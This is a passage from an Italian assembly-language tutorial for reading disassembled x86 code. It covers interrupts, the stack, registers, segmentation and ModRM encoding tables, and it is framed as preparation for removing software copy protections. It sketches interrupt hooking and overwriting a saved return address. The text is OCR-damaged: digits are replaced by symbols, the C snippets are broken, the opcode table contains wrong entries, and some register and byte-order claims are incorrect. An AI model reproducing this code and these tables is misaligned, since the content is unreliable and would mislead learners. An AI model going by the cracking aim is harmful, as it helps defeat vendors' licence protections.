programmazione in assembler ma vuole soltanto dare un’infarinatura che vi 
permetta di analizzare il codice mostrato dai disassemblatori. 

Creare un buon manuale dell’assembler Pentium, x86 non è cosa semplice proprio 
per la complicazione dei processori stessi. 

In fase di programmazione esistono specifiche che vi permettono di definire 
segmenti, macro ecc. 

Nei listati riportati dai disassemblatori molte specifiche non sono mostrate in 
quanto i linguaggi che hanno originato il codice che vedete non sono di fatto 
assembler, ma qualsiasi altro a partire da Delphi per giungere a Basic ecc. 
Anche programmi che sono stati scritti in Macro Assembler dopo essere compilati 
perdono le loro caratteristiche. 

Questi programmi, infatti, fanno riferimento a simboli che il compilatore e il 
linker traducono in qualche altro modo o che comunque utilizza come direttive. 
Oltre a questo considerate che il codice che vedete in un debugger è quello in 
esecuzione per cui gli indirizzi sono assoluti. 

Veniamo al sodo. 

Originariamente l’elettronica dei PC è composta da processori dedicati alle 
varie funzioni che possiedono porte di programmazione e servizi per la richiesta 
di certe funzionalità, generalmente residenti su ROM presenti sulle schede 
stesse. 

La programmazione diretta dell’hardware del sistema tramite le varie porte di 
I/0 sarebbe una cosa sufficientemente complessa e lunga per cui i costruttori 
dei personal hanno fornito i sistemi con all’interno un BIOS (Basic Input Output 
System) che offre servizi di base per la programmazione delle periferiche 
hardware. 

I servizi sono inseriti dentro a quelli che vengono definiti come interrupts che 
potremmo un pò paragonarli a metodi che possono essere richiamati in qualsiasi 
istante dai nostri programmi per eseguire diversi tipi di funzioni. 

Esistono funzioni d’interrupts legate alla scheda video, adatte a settare la 
modalità, a stampare caratteri, a settare colori ecc. 

Altre funzioni d’interrupts sono legate alle porte di comunicazione seriale e 
parallela e quindi indirizzate a controllare stampanti e modem. 

Anche i dischi possiedono le proprie funzioni d’interrupts per il loro 
controllo. 

Queste funzioni offrono servizi minimali per cui il sistema operativo fornito 
con il computer aggiunge un altra serie d’interrupts pi ad alto livello che 
normalmente sono indicati come interrupts del DOS. 

Per spiegarmi meglio voglio riportare ad esempio l’interrupt che controlla il 
disco. 

Questo offre servizi minimali come ad esempio leggi un settore oppure scrivi un 
settore. 

Pensate se dovessimo scriverci noi tutte le routine per scrivere in un file e 
per fare in modo che questo venga strutturato in un insieme che costituisce le 
diretctory del nostro disco ! 

Sarebbe una cosa mostruosa. 

I servizi del DOS offrono funzionalità come ad esempio APRI UN FILE, LEGGI DAL 
FILE, CANCELLA IL FILE etc. 

Infatti il DOS supportandosi sul Bios eleva le sue funzionalità. 

Il discorso degli interrupts è vasto e in alcuni casi complessi per cui in 
questa sede tralascierò gran parte della teoria per riportare solo le cose che 
possono essere importanti nel caso in cui si tenti di raggiungere una finalità 
come quella di sproteggere un programma. 

Gli interrupts si suddividono in due parti ovvero gli interrupts hardware e 
quelli software. 

A dire il vero esiste anche un terzo tipo anche se personalmente non oserei 
definirli come tali. 


In pratica questi sono gli interrupts di tabella il cui scopo è quello di 
fornire l’indirizzo di alcune tabelle di sistema. 

In altre parole quando viene chiamato un interrupt il sistema interompe quello 
che stava facendo salvando i dati da qualche parte, reperisce l’indirizzo 
dell’interrupt e prosegue l'esecuzione partendo dall'indirizzo reperito. 

Negli interrupts di tabella serve solo reperire l'indirizzo in quanto a 
quell’offset esistono dati utilizzati dal sistema. 

Le varie circuiterie elettroniche che compongono l’hardware dei nostri sistemi 
utilizzano gli interrupts hardware per segnalare alcuni eventi. 

Ad esempio un chip che controlla la porta seriale richiama un interrupts per 
segnalare la ricezione di un carattere. 

Gli interrupts possiedono una priorità per cui nel caso in cui vengano chiamati 
più interrupts l’ordine di esecuzione dipende proprio da questo. 

La memoria del sistema possiede una tabella a partire dall'indirizzo © che usa 
per mantenere gli indirizzi dei 256 interrupts possibili. 

Ogni indirizzo è costituito da 4 bytes per cui questa tabella è di 1024 bytes (4 
* 256). 

Nei computers esiste un concetto che è legato a quello che è lo stack che per 
ora vedremo scorporandolo dal concetto di segmento. 

Questo fatidico stack potrebbe essere paragonato allo spunzone dove i baristi 
infilano gli scontrini delle consumazioni. 

Chiaramente il primo scontrino inserito, in fase di estrazione, sarà anche 
l’ultimo ad essere estratto. 

Lo stack in un sistema è una zona della memoria che viene utilizzata per diversi 
scopi il cui funzionamento si attiene a questa logica. 

Lo stack serve per inserirci momentaneamente gli indirizzi di ritorno nelle 
chiamate subordinate. 

Nel caso di chiamate ad interrupts il sistema usa lo stack per inserire gli 
indirizzi di ritorno al punto in cui è avvenuta la chiamata. 

Per chi conosce il Basic posso riportare i due concetti legati al GOTO e al 
GOSUB. 

La prima è una chiamata incondizionata, ovvero il programma interrompe la 
sequenzialità nella sua esecuzione ed esegue un salto ad un altro punto, senza 
più ritornare a dove è stata eseguita la chiamata. 

La seconda invece necessita della memorizzazione dell’indirizzo di dove è stato 
eseguito il salto in quanto, dopo aver trovato l’istruzione RETURN, il programma 
dovrà ritornare al punto d'origine. 

Questo avviene anche per la chiamata a funzioni. 

Supponiamo che sia abbia il seguente codice. 


FUNZ_1 
SALVA_INDIRIZZO_NELLO_STACK 
ISTRUZIONE 1 
ISTRUZIONE n 
RIPRISTINA_INDIRIZZO_DALLO_STACK 
FINE_FUNZ_1 


ISTRUZIONE X 
CHIAMA_FUNZ_1 
ISTRUZIONE Y 


La funzione salverà l'indirizzo nello stack e lo ripristinerà in uscita. 

Lo stack viene utilizzato anche per il salvataggio delle variabili locali, che 
come molti sanno, hanno un ciclo di vita pari a quello della durata della 
funzione stessa dove vengono dichiarate. 

Ad esempio le variabili a e b vengono inserite nello stack. 


void funzione() 
{ i 

int a; 

int b; 

n=a + b; 


} 


Una cosa che potreste trovare interessante. 
Abbiamo detto che a e b sono allocate nello stack per cui usando l’operatore del 
C che restituisce un indirizzo avremo che 


&a e &b 


sono due indirizzi che sono riferiti a posti nello stack. 

Abbiamo anche detto che una funzione in entrata salva l'indirizzo dove dovr 
tornare nello stack. 

Questo significa che nello stack troveremo 


b -> ultimo valore allocato nello stack (2 bytes) 
a -> penultimo (2 bytes) 
indirizzo_ritorno -> indrizzo di ritorno (4 bytes) 


Per cui se trattiamo indirizzi a 4 bytes avremo che 
&a - 4 


corrisponde al posto dove la funzione ha salvato l’indirizzo di ritorno. 
Se usassimo il puntatore 


*(&a - 4) 


arriveremmo al contenuto ovvero all'indirizzo. 

Se a questo punto usassimo il costrutto di prima per assegnare un altro 
indirizzo potremmo ottenere che in uscita dalla funzione ritorneremmo ad un 
altro punto che non è quello da cui siamo partiti richiamando la funzione 
stessa. 

Lo stack viene inoltre utilizzato dalle funzioni per salvare i registri che 
vengono alterati dalle funzioni localmente in modo da non creare problemi alle 
funzioni chiamanti. 

Alcuni registri per convenzione vengono usati per passare i valori alle funzioni 
e per avere dei valori di ritorno. 

Altri registri vengono usati nelle elaborazioni locali della funzione stessa. 

I registri non usati per questo tipo di lavoro legato agli argomenti in ingresso 
ed in uscita possono essere salvati sullo stack in modo tale che il loro 
utilizzo localmente alla funzione non crei problemi. 

Ad esempio potrei usare il registro ESI per qualche motivo e poi chiamare una 
funzione che utilizza questo registro. 


Mov esi, 99 
Call 00404FFC 


A 00404FFC potrei avere 


Push esi 

Mov esi, 45 

Pop esi 

Ret 

In questo modo il valore ESI verrebbe mantenuto integro anche dopo il suo uso 
nella funzione chiamata. 

Spesso diventa problematico, nel seguire le istruzioni di un programma, capire a 
che cosa servono le varie Push. 

Per schiarirci le idee possiamo seguire una logica. 

Le varie Push prima di una call potrebbero servire a passare argomenti. 

Le Push all’inizio di una funzione controllate che non corrispondano delle Pop 


in uscita. 
In questo caso servirebbero solo a salvare l’ambiente. 


:004039D8 push ebx 

:004039D9 push esi 

:004039DA push edi 

:004039DB mov ebx, eax 

:004039DD mov esi, edx 

:004039DF mov edi, ecx 

:004039E1 mov eax, edi 

:004039E3 call DIRPRINT.004039B4 
:004039E8 mov ecx, edi 

:004039EC test esi, esi 
:004039EE je 004039F9 

:004039F0 mov edx, eax 

:004039F2 mov eax, esi 

:004039F4 call DIRPRINT.00402878 
:004039F9 mov eax, ebx 

:004039FB call DIRPRINT.004038F4 
:00403A00 mov dword ptr [ebx], edi 
:00403A02 pop edi 

:00403A03 pop esi 

:00403A04 pop ebx 

:00403A05 ret 


Nell'esempio precedente vedete che all’inizio della funzione ci sono tre push 
alle quali alla fine corrispondono 3 pop. 

Notate anche che nei calcoli locali alle funzioni vengono usati proprio quei 
registri che vengono salvati. 

In questo modo viene salvaguardato il loro contenuto. 

Parlavamo prima degli interrupts. 

Ebbene, anche in questo caso viene usato lo stack in quanto gli indirizzi di 
ritorno dopo l'esecuzione delle funzioni d’interrupts vengono salvati in questo 
segmento. 

Se volete vedere gli indirizzi di dove si trovano gli interrupts potete andare 
ad analizzare i primi 1024 bytes di memoria. 

Come ? 

Spesso chi arriva dal Basic al C si lamenta che il C non possiede funzioni come 
quelle basic Peek e Poke che servono a leggere e scrivere valori in memoria. 

In C queste funzioni non servono a nulla in quanto grazie all’aritmetica dei 
puntatori sono completamente superflue. 

Se io definisco 


unsigned int *memory; 

significa che memory è un puntatore ad una zona di memoria di 2 bytes ovvero le 
dimensioni di un int. 

La dichiarazione precedente non indica ancora a dove punta memory in quanto non 
gli è stato ancora assegnato un indirizzo. 

Se facessi 

memory = &var_int; 


assegnerei a memory l’indirizzo di dove si trova var_int. 
Potrei però farci un assegnazione diretta ovvero 


memory = (unsigned int *) 0xb0000000L; 
In questo caso il cast forzerebbe a vedere 0xb000000 come se fosse un indirizzo 
di memoria. 


In questo modo facendo 


memory = (unsigned int *) 0x00000000L; 


forzerei memory a puntare all’indirizzo © per cui leggendogli il contenuto 
vedrei l’indirizzo del primo interrupt. 

Considerando che ogni indirizzo è di 4 bytes fate presto a fare i calcoli per 
stabilire l’indirizzo giusto. 

Questo metodo riporta i 4 bytes relativi all'indirizzo. 

Spesso gli indirizzi vengono memorizzati in memoria nel formato 


offset:segmento 


Se invece di definire la mia variabile come puntatore a 4 bytes, come potrebbe 
essere un puntatore ad un long, la definissi come un puntatore ad una struttura 
del tipo 


struct off_seg { 
unsigned int segmento; 
unsigned int offset; 


}; 
struct off_seg *memory = (struct off_seg *) 0x00000000L; 
Avrei automaticamente i valori dell’ offset e del segmento divisi in 


memory. segmento; 
memory .offset; 


Conoscere l’indirizzo di dove sono ubicate le routines degli interrupts è utile 
in quanto spesso è necessario sostituirle con nostre funzioni al fine di 
intercettare certe chiamate. 

Alcuni tipi di protezioni erano basate su certi interrupts per cui era 
necessario capire dove erano chiamate. 

I programmi d’intercettazione avevano un flusso di questo tipo 


leggi l’ indirizzo di dove si trova l’interrupt desiderato 
prendi l'indirizzo della nostra funzione e sostituiscilo 


A questo punto ogni volta che veniva chiamato l’interrupts desiderato veniva 
richiamata la nostra funzione la quale eseguiva il seguente codice. 


Guarda perchè è stata chiamata 
Esegui quello ce devi fare 
Se è il caso invia al vecchio interrupts di cui conosci l’indirizzo 


Debuggers come SoftIce hanno la possibilità di visualizzare la mappatura di 
memoria. 
Utilizzando il comando 


MAPV86 


si ottiene la visualizzazione di come è mappata la memoria. 
Ad esempio 


Start Length 

0000:0000 0040 Interrupt Vector Table 
0040:0000 0030 ROM BIOS Variables 
0070:0000 005A 1/0 System 

00ca:0000 —014C DOS 

0259:0000 0046 XMSXXXX0 

029F:0000 0207 CON 

ecc. 


Alcune funzionalità importantissime legate al debug dei programmi e quindi alle 
protezioni che cercano di eludere i debugger sono legate ad alcuni interrupts 
come ad esempio INT1 e INT3. 


Fino ad ora abbiamo parlato di segmenti senza definire che cosa si intendeva. 
Generalmente potremmo indicare con segmento il termine adatto ad indicare le 
diverse zone funzionali di un programma. 

Un programma possiede in genere di una zona di codice, una di dati e una in cui 
memorizza le informazioni momentanee (lo stack). 

Potremmo usare il termine segmento per indicare queste zone. 

Questa abitudine nasce però dal fatto che per motivi tecnici, dal punto di vista 
elettronico, i programmi usavano questi segmenti che erano zone di 64 Kbytes 
ciascuno. 

Una volta quando i processori erano a 8 e a 16 bits gli address bus dei sistemi 
erano a 20 bits. 

Prima di proseguire diamo una rapida ripassata sul come è strutturato un sistema 
elettronico in forma generalizzata. 


| Address Bus 


Logicamente potremmo suddividerlo in 5 blocchi logici. 

Il primo blocco è quello della CPU alla quale sono demandati tutti i compiti 
legati all'esecuzione delle istruzioni del sistema. 

La CPU, a seconda del tipo, possiede al suo interno l'interprete del microcodice 
il quale interpreta le istruzioni ma a noi di questo interessa poco. 

La cosa pi interessante è legata al fatto che all’interno della CPU sono 
contenuti dei registri che potremmo paragonarli a variabili che il processore 
stesso usa per scopi suoi. 

Questi registri possiedono una certa dimensione anche se in genere possono 
essere visti come insiemi di contenitori pi piccoli. 

Ad esempio uno di questi registri è chiamato EAX il quale è grosso 32 bits. 
Facendo riferimento a EAX utilizziamo un numero a 32 bits. 

EAX però può essere visto come registro AX a 16 bits. 

A sua volta AX può essere usato come due registri a 8 bits e precisamente in AL 
e AH. 

Fate attenzione che non sono registri a parte per cui se assegnassimo un valore 
ad AX e poi uno ad AH andremmo a scrivere sopra alle informazioni inserite nella 
prima istruzione. 

In pratica se facessimo 


MOV AX, 1 
MOV AH, 1 


In 0AX alla fine avremmo il numero rappresentato da quello binario 
0000000100000001. 

La prima istruzione inserirebbe in AX il valore a 16 bits 1 che espresso in 
binario sarebbe 0000000000000001. 

La seconda istruzione inserirebbe in AH, che equivale alla parte alta di AX, il 
valore a 8 bits 00000001. Quindi come risultato avremmo quello indicato prima. 


In pratica considerate i registri come se fossero delle union del C. 
Per chi non lo sapesse in C la dichiarazione della struttura: 


struct x { 
int a; 
int b; 
} n; 
occuperebbe in memoria la somma dei membri dichiarati nella struttura stessa e a 


e b sarebbero due variabili divise e distinte. 
La dichiarazione: 


union X { 
int a; 
char ah; 
} nj 


riserverebbe in memoria lo spazio per il maggiore delle variabili definite. 

In questo caso per l’unione verrebbero allocati 2 bytes relativi all’int. 

La variabile ah utilizza una parte della memoria riservata per a e quindi se noi 
prima assegnassimo un valore ad a e poi uno ad ah andremmo a sovvrascrivere il 
valore settato nella prima istruzione. 

La CPU possiede diversi registri alcuni usati come accumulatori di uso generale 
ed altri invece possiedono scopi precisi. 

Il registro EIP ad esempio mantiene l'indirizzo dell’ istruzione da eseguire. 
Altri registri come ad esempio ESI, ECS ecc. sono usati per mantenere gli 
indirizzi dei segmenti. 

Avevamo iniziato prima il discorso di questi segmenti. 

Una volta i registri dei processori erano al massimo 16 bits. 

Uno dei blocchi del sistema teorico visto prima era quello relativo all’address 
bus ovvero del bus indirizzi usato per comunicare quale è l’indirizzo 
interessato n un operazione di lettura o di scrittura. 

Se ad esempio la CPU desiderasse leggere un valore dalla RAM dovrebbe indicare 
l’intenzione di READ mediante un segnale sul pin di R/W tra CPU e memoria e 
successivamente dovrebbe specificare l’indirizzo interessato tramite l’address 
bus. 

Questo address bus nei sistemi vecchi, prima della comparsa dei processori a 32 
bits, era di 20 bits per cui la memoria veniva utilizzata in questo modo. 

Tenete presente che anni fa i chips di memoria non contenevano certo dei Mbytes 
ma spesso non superavano i 32 Kbytes. 

Quando si disponeva di chips da 64 Kbytes per raggiungere 640 Kbytes ne erano 
necessari 10. 

Elettronicamente questi erano collegati allo stesso address bus per cui senza 
una strategia particolare la segnalazione di indirizzo nnnn ad uno equivaleva a 
far giungere questo segnale a tutti i chips. 

Spero che la descrizione data vi permetta di comprendere a grandi linee le 
necessità che hanno indotto ad adottare il concetto di segmentazione. 
Chiaramente la descrizione potremmo definirla semplicistica in quanto le 
metodologie elettroniche sono sufficentemente complesse ed in continua 
evoluzione. 

Ad ogni modo il discorso dell’ address bus a 20 bits è andato avanti per un pò 
di tempo. 

Per chi non avesse seguito l'evoluzione dei personal può pensare al mio caso per 
farsi un idea a riguardo dei camiamenti tecnici e finanziari. 

Pensate che il primo personal lo vidi all’univesità nel 1979 ed era un CEP 20 
con basic incorporato. 

Quando acquistai il primo personal era il 1983 e si trattava di un PC IBM con 
8088 a 4.77 mhz, 256 kbytes (forse espanso in quanto di base mi pare fossero 64 
Kbytes) di memoria e floppy a 360 Kbytes (costo L. 6.700.000). 

Nel 1986 passai al 386 Wyse (L. 11.200.000). 

I primi processori 386 erano bacati per cui l’address bus doveva essere ancora 
trattato come per i software a 16 bits. 


DEC 


4 bits 


CS Cs Cs (CS = chip select) 


16 bits 


In pratica il bus a 20 bits indirizzava sull’ address bus i primi 16 mediante i 
quali era possibile indirizzare 64 Kbytes. 

Dato che tutti i chip ricevevano il segnale i decoder, al quale giungevano i 4 
bits pi alti, inviava il segnale di chip select al chip interessato. 

Il metodo funziona indipendentemente dal numero di bytes di chiascun chips in 
quanto, ad esempio, con meno bytes rimanevano pi bits da inviare sul decoder il 
quale poteva abilitare pi chip. 

Per questo motivo f utilizzato il registro di segmento in quanto 16 bits 
venivano utilizzati per indicare l'indirizzo, che poteva essere 64 kbytes, e il 
segmento invece indicava da quale indirizzo contare i 64 kbytes. 

L'indirizzo reale può essere ricavato dal seguente calcolo che utilizza i valori 
in esadecimale. 


SSSs0 valore del segmento shiftato verso sinistra di 4 bits 
AAAA indirizzo offset (16 bits 0x0000 - Oxffff) 
RRRRR indirizzo reale sull’address bus (20 bits) 


Con la nascita dei processori a 32 bits il discorso non era pi valido in quanto 
un EIP a 32 bits poteva indirizzare 4 miliardi di bytes senza dover usare il 
truscolino del segmento o perlomeno i segmenti non erano pi relegati alle 
dimensioni di 64 Kbytes. 

Una tabella più dettagliata per il calcolo dell'indirizzo è la seguente 


8088/8086 Effective Address (EA) Calculation 


Description Clock Cycles 
Displacement 6 
Base or Index (BX,BP,SI,DI) 5 
Displacement+(Base or Index) 9 
Base+Index (BP+DI,BX+SI) 7 
Base+Index (BP+SI,BX+DI) 8 
Base+Index+Displacement (BP+DI,BX+SI) 11 
Base+Index+Displacement (BP+SI+disp,BX+DI+disp) 12 


- add 4 cycles for word operands at odd addresses 
- add 2 cycles for segment override 
- 80188/80186 timings differ from those of the 8088/8086/80286 


Quanto segue è relativo alla teoria dell'indirizzo effettivo cosa da cercare di 
comprendere per riuscire a dimesticarsi in mezzo a tutte le tipologie di 
indirizzamento legate alle istruzioni (MOV AX, [BP+FFFFF9], ecc.). 

Fate attenzione che le informazioni legate alla tabella di codifica relativa 
agli indirizzi effettivi serve a calcolare gli op-code mostrati nella tabella 
delle istruzioni al termine di questo capitolo. 

Molti accessi vengono eseguiti nei sistemi x86 mediante la tecnica 
dell’indirizzamento effettivo. 

Ogni qualvolta che appare un indirizzamento effettivo nella lista delle 
istruzioni x86 è possibile utilizzare una grossa gamma di operandi in queste 
istruzioni. 

Queste includono registri generali, variabili di memoria ed indici vari. 

I registri li abbiamo gi visti (EAX, AX, EH, AL ecc.) 

Le variabili di memoria possono essere a byte, word o dword e comunque anche di 
queste abbiamo gi parlato. 

La dichiarazione avviene, lo ricordo, con 


DATA_PTR DW ? 
ESC_CHAR DB ? 


I movimenti di dati da re per queste variabili avvengono con 


MOV SI,DATA_PTR ; legge DATA PTR in SI 

LODSW ; fetch la word puntata da DATA _PTR 

MOV DATA_PTR,SI ; salva il valore incrementato da LODSW 
MOV BL, ESC_CHAR ; legge la variabile a byte ESC_CHAR 


Alternativamente è possibile usare le parentesi [] per indicare un indirizzo. 
MOV AL, [02000] ; legge il contenuto di 02000 in AL 


Spesso nei listati in esame si ha che fare con strane indicizzazioni di memoria 
che a volte nascondono strani concetti. 

Il sistema x86 supporta dei registri usati come puntatori a basi oppure come 
indici. 


BX e BP sono definiti base-registers. 
SI e DI sono definiti index-registers. 


E’ possibile combinare almeno un registro base, almeno iun registro d’indice e 
costanti come puntatori utilizzati a run-time per determinare l’indirizzo 
effettivo. 

I seguenti sono esempi di quanto detto. 


MOV AX, [BX] 

MOV CX,W[SI+17] 

MOV AX, [BX+BP+5] 

MOV AX, [BX][BP]5 ; un altro modo d scrivere la stessa istruzione 


L'’indicizzazione può essere effettuata dichiarando variabili in una struttura 
basicizzata (?). 


STRUC [BP] ; based structure 
BP_SAVE DW ? 
RET_ADDR DW ? 
PARM1 DW ? 
PARM2 DW ? 
ENDS 
INC PARM1 ; equivalente a INC W[BP+4] 


Finalmente l’indicizzazione può essere eseguita mixando componenti espliciti con 
altri dichiarati. 


TABLE DB 4,2,1,3,5 
MOV AL, TABLE[BX] 


Avevamo detto che il processore della famiglia x86 per lo pi (sottolineo in 
generale in quanto dal 386 in su ci sono anche altre cose) possiede quattro 
registri di segmento. 

Ogni registro punta a spazi di 64Kbytes. 

Quando nella programmazione eseguiamo istruzioni con riferimenti ad indirizzi 
possiamo utilizzare certe informazioni in modo diretto od indiretto. 

Ad esempio in molte istruzioni il registro di data segment viene utilizzato di 
default in tutte quelle istruzioni che fanno riferimento a dati. 

Quando il nostro programma può stare, tra codice dati e stack, in 64Kbytes 
allora tutti i registri CS, DS e SS possono puntare allo stesso valore. 

Chi si ricorda dell’utility fornita con le vecchie versioni del DOS, EXE2BIN, 
conoscer lo scopo di questo. 

In pratica quando un programma possedeva queste caratteristiche allora poteva 
essere trasformato in un file .COM anzichè .EXE per cui dopo la compilazione e 
dopo il linking poteva essere preso da questo programma e trasformato in .COM. 
La prerogativa era appunto che il tutto doveva stare in 64Kbytes. 

Questo cambiava il modo di richiamare le funzioni e di indizzare la memoria. 
Parlando di programnmi a pi segmenti si doveva parlare di chiamate ed 
indirizzamenti intrasegmentali ed extrasegmentali. 

Chiaramente se una call o un mov doveva avvenire dentro al segmento in cui c’era 
l’istruzione l’indirizzo di riferimento poteva essere a 16 bits mentre se ci si 
riferiva all’esterno questo doveva essere a 32 bits ovvero composto da 
SEGMENTO : OFFSET. 

In effetti nelle istruzioni intrasegmentali i regsitri di segmento venivano 
usati di default. 

Facciamo un esempio supponendo di voler muovere in AL il valore in memoria 
puntato da BX. 


MOV AL, [BX] 


In questo caso il registro DS viene usato di default per comprendere a quale 
segmento DX punta. 
Se si desidera trattare BX nel code segment si deve codificare 


CS MOV AL, [BX] 


Fate attenzione che questo metodo viene indicato come segment ovverride e che 
funziona SOLO con l'istruzione successiva. 
Se si avesse CS che punta ad un segmento e DS ad un altro la sequenza 


Cs 
MOV AL, [BX] 
MOV AH, [BX] 


muoverebbe in AH e AL due valori differenti (probabile) o perlomeno derivanti da 
due indirizi diversi. 

Esistono in macroassembler direttive (ASSUME ecc.) che agiscono sui segmenti, ma 
come ho detto prima nei disassemblati non compaiono. 

Ricordatevi anche che tutte le istruzioni permettono indirizzi effettivi comre 
operandi. 

Ogni istruzione con un indirizzo effettivo ha un encode byte conosciuto come 
effective address byte seguito da un op-code di 1 byte per l'istruzione. 

Per motivi oscuri l’intel chiama questo byte ModRM byte. 

Se l’indirizzo effettivo è una variabile di memoria o un locazione di memoria 
indicizzata con un valore di offset costante diverso da © allora il byte 
dell'indirizzo effettivo sarà immediatamente seguito dall’ammontare dell’offset. 
Quest’ammontare nel range tra -128 e +127 è rappresentato da un singolo byte con 
segno contrassegnato da D( nella tabella seguente. 

L'ammontare che richiede 16bits come qantit di memoria è contrassegnato da D16. 


Come tutte le quantità a 16 bits nella famiglia x86 la WORD è salvata con il 
byte pi significativo prima. 

La seguente tabella è organizzata in 32 righe da 8 colonne e rappresentano i 
possibili valori per un operando relativo ad un indirizzo effettivo : 8 egistri 
e 24 modi di indicizzazione della memoria. 

Un venticinquesimo modo, [BP] con zero come spiazzamento, è sato pre-riempito da 
una semplice variabile di memoria. 

Se dovete codificare [BP] con nessun spiazzamento dovete prendere [BP]+D8 con il 
valore di D8 a zero. 

Le 8 colonne della tabella riflettono informazioni relative al byte 
dell'indirizzo effettivo. 

Normalmente questa è l’identità di altri operandi (sempre registri) di 
istruzioni a 2 operandi. 

Queste istruzioni sono identificate da un “/r” seguito dal codic4e operativo. 
Alcune volte le informazioni passate pretendono un supplemento per 
l’identificazione delle stesse istruzioni. 

Per esempio supponiamo di voler conoscere precisamente i bytes della codifica 
dell’istruzione SUB B[BX+17],100. 

Questa istruzione sottrae una quantità (100) da un indirizzo effettivo 
(B[BX+17]). 

Consultanto la lista delle istruzioni si trova la forma generale SUB eb,ib 
(cercate le istruzioni nella lista alla fine del capitolo). 


80 /5 ib SUB eb,ib Subtract immediate byte from EA byte 


L’ opcode è 80 /5 ib. 

Il /5 denota un byte d’indirizzo effettivo il cui valore viene preso dalla 
colonna 5 della seguente tabella. 

L'offset 17 decimale (11 hex) si adatta a un singolo byte D8 il quale prende il 
valore dalla riga “[BX] + D8”. 

La tabella ci dice che l’indirizzo effettivo è 6F. 

Immediatamente dopo 6F c’è l’offset (11 hex). 

Coniderando che il valore ib-value è 100 (64 hex) allora l’istruzione SUB 
B[BX+17], 100 è 80 6F 11 64. 

Ripeto qnto avevo gi accennato all’inizio del capitolo. 

La lista da utilizzare combinata alla seguente tabella è quella riportata al 
termine di questa sezione. 


ss ES CS SS DS 
rb = AL CL DL BL AH CH DH BH 
rw = AX CX DX BX SP BP SI DI 
digit= 0 1 2 3 4 5 6 7 
Effective 
EA byte address: 


values: 00 08 10 18 20 28 30 38 [BX + SI] 


06 OE 16 1E 26 2E 36 3E D16 (simple var) 
07 OF 17 1F 27 2F 37 3F [BX] 


40 48 50 58 60 68 70 78 [BX + SI] + D8 
41 49 51 59 61 69 71 79 [BX + DI] + D8 
42 4A 52 5A 62 6A 72 7A [BP + SI] + D8 
43 4B 53 5B 63 6B 73 7B [BP + DI] + D8 


44 4C 54 5C 64 6C 74 7C [SI] + D8 
45 4D 55 5D 65 6D 75 7D [DI] + D8 
46 4E 56 5E 66 6E 76 7E [BP] + D8 
47 4F 57 5F 67 6F 717 7F [BX] + D8 
80 88 90 98 AQ A8 BO B8 [BX + SI] + D16 


81 89 91 99 A1 A9 B1 B9 [BX + DI] + D16 
82 8A 92 9A A2 AA B2 BA [BP + SI] + D16 
83 8B 93 9B A3 AB B3 BB [BP + DI] + D16 
84 8C 94 9C A4 AC B4 BC [SI] + D16 

85 8D 95 9D A5 AD B5 BD [DI] + D16 

86 8E 96 9E A6 AE B6 BE [BP] + D16 

87 8F 97 9F A7 AF B7 BF [BX] + D16 

co c8 DO D8 EO E8 FO F8 ew=AX eb=AL 
C1 C9 D1 D9 E1 E9 F1 F9 ew=CX eb=CL 
c2 CA D2 DA E2 EA F2 FA ew=DX eb=DL 
C3 CB D3 DB E3 EB F3 FB ew=BX eb=BL 
C4 CC D4 DC E4 EC F4 FC ew=SP eb=AH 
C5 CD D5 DD E5 ED F5 FD ew=BP eb=CH 
C6 CE D6 DE E6 EE F6 FE ew=SI eb=DH 
C7 CF D7 DF E7 EF F7 FF ew=DI eb=BH 


D8 denotes an 8-bit displacement following the EA byte, 
to be sign-extended and added to the index. 


D16 denotes a 16-bit displacement following the EA byte, 
to be added to the index. 


Default segment register is SS for effective addresses containing 
a BP index; DS for other memory effective addresses. 


Ritorniamo al discorso della segmentazione che facevamo prima di questa parte 
legata agli indirizzi effettivi. 

Chiaramente fattori di compatibilità con i software vecchi ha obbligato a 
mantenere questo metodo dei segmenti attivo per cui ancora oggi troviamo spesso 
gli indirizzi specificati con 


segmento :offset 


La visione legata all’uso dei vari segmenti è sicuramente maggiore nei 
programmatori che vengono dal Linguaggio C dato che in quasi tutti gli altri 
linguaggi la visione di questi è trasparente. 

Il programmatore in C, ad esempio, sa bene che le variabili dichiarate 
localmente ad una funzione, senza specificatori di classi di memoria 
particolari, vengono allocate dentro al segmento di stack per cui è sempre cura 
del programmatore allocare, mediante specifici flags del compilatore, le 
dimensioni adatte di questo. 

Nel C si deve anche sapere che le variabili globali vengono definite dentro al 
segmento dati proprie del modulo in cui compaiono, senza contare che spesso si 
deve dimesticare in mezzo ai vari #pragma che influiscono sui nomi e sulle 
tipologie dei segmenti. 

Un programma generalmente è costituito da codice e da dati. 

Ogni istruzione del processore dispone di codice di operazione che definisce 
anche le dimensioni dell’operazione stessa e dei suoi operandi. 

Il codice normalmente è ubicato in un o specifico segmento che prende appunto il 
nome da questo ovvero possiede il nome di code segment. 

I dati usati dal programma possono essere allocati dentro ai segmenti dati 
oppure dentro al segmento di stack. 

Mentre altri linguaggi possiedono una visione ferrea di questi concetti, anzi 
quasi sempre li rendono trasparenti all’utente, il linguaggio C obbliga il 
programmatore a tenere gli occhi aperti. 

Spesso erano comuni errori in esecuzione del tipo ‘Stack overflow”. 

Se si andava a vedere bene il tutto ci si accorgeva che magari il compilatore di 
default allocava 4096 bytes per il segmento di stack. 

Andando ad analizzare il codice si trovava in un punto 


void function() 


int a[5192]; 


} 
Il programma allocava nello stack 5192 * dimensione_int bytes nello stack e 
quindi ... ‘Stack overflow”. 


Allora la soluzione era quella di chiedere al compilatore di ridimensionare lo 
stack. 

In assembler la definizione dei segmenti avviene con la specifica di SEGMENT ed 
eventualmente è anche possibile stabilire l’origine. 

Con il programmino che segue è possibile visualizzare i dati di stack. 


#define STACKLOW 1 
int *stacktop, *ip; 


void main(int argc, char *argv[]) 


{ 
stacktop = (int *) &argv; 
printf("&argc=%081x &argv=%081x\n", &argc, &argv); 
printf("&main=%081x &f=%081x &g=%081x\n", main, f, g); 
f(0x11112222, 0x33334444); 

} 

int f(int arg_1, int arg_2) 

{ 
9(0x55556666); 

} 

int g(int arg_2) 

{ 


int local; 


local = 0x77778888; 
#ifdef  STACKLOW /* Stack grows towards LOWER addresses */ 
for (ip = stacktop; ip >= &local; ip--) 


#else /* Stack grows towards HIGHER addresses*/ 
for (ip = stacktop; ip <= &local; ip+t+) 
#endif 


printf("%081x\t%08x\n", ip, *ip); 
} 


La seguente è la definizione di un segmento dati con origine a 2000. 


DATA SEGMENT 
ORG 02000 


(qui ci vanno le dichiarazioni dei vostri dati) 
DATA ENDS 


Il seguente listato mostra come è possibile ricavare informazioni relative al 
segmento dati di un programma in esecuzione. 


#include <afxwin.h> 
#include <afxext.h> 
#include <dos.h> 
#include "resourc2.h" 


